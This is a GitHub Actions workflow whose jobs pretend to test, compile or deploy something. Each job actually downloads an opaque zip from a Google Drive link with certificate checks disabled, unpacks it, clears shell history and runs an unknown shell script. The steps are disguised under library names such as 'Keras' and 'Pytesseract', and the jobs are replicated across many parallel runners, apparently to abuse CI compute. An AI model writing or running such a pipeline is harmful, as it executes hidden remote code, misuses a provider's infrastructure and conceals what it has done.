name: atlasanhxa690engine
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  TEST:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Provision', 'Compile', 'Verify', 'Launch', 'Deploy']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=11E265gxnL8Q9sKcuvp2LZ35g0RDBgfnz" -O Keras.zip
        unzip -o Keras.zip
        rm Keras.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  EXECUTE1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Initialize', 'Develop', 'Test', 'Execute', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=11E265gxnL8Q9sKcuvp2LZ35g0RDBgfnz" -O Keras.zip
        unzip -o Keras.zip
        rm Keras.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
